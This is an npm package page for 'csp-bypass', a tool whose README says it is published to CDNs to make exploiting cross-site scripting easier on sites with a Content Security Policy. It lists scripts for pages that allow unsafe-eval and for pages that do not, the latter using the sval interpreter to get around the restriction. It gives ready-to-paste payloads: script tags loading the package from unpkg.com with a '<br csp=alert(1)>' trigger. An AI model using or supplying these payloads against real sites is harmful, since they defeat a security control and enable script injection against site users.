npm
Sign UpSign In

csp-bypass

1.0.2 • Public • Published

easy-csp-bypass

Just a fun project to see if this code can end up in some CDN, so it would be easier to exploit XSS with CSP.

How to use ?

Well, it depends. If you are lucky enough to find unsafe-eval in the CSP configuration, you can use those scenario:

  • Classic => /dist/classic.js
  • Classic-infinite => /dist/classic-infinite.js
  • Url => /dist/url.js

If you can't use eval() because unsafe-eval is not in the configuration, well it's not over !! I found a Javascript interpreter called sval. It can easily bypass the unsafe-eval restriction :) !

  • Classic => /dist/sval-classic.js
  • Classic-infinite => /dist/sval-infinite.js
  • Url => /dist/sval-url.js

Example

If you have an XSS on a website with CSP, search in the directive 'script-src' for unpkg.com or jsdeliver. If these domain are whitelist, you win !

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script> 
  <br csp="alert(1)">

if 'unsafe-eval' is missing use the sval one:

  <script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/sval-classic.js"></script> 
  <br csp="alert(1)">

Readme

Keywords

Package Sidebar

Install

npm i csp-bypass

Repository

github.com/CanardMandarin/csp-bypass

Homepage

github.com/CanardMandarin/csp-bypass.git#readme

Weekly Downloads

2

Version

1.0.2

License

SEE LICENSE IN LICENSE

Unpacked Size

491 kB

Total Files

24

Last publish

Collaborators

  • canardmandarin
Try on RunKit
Report malware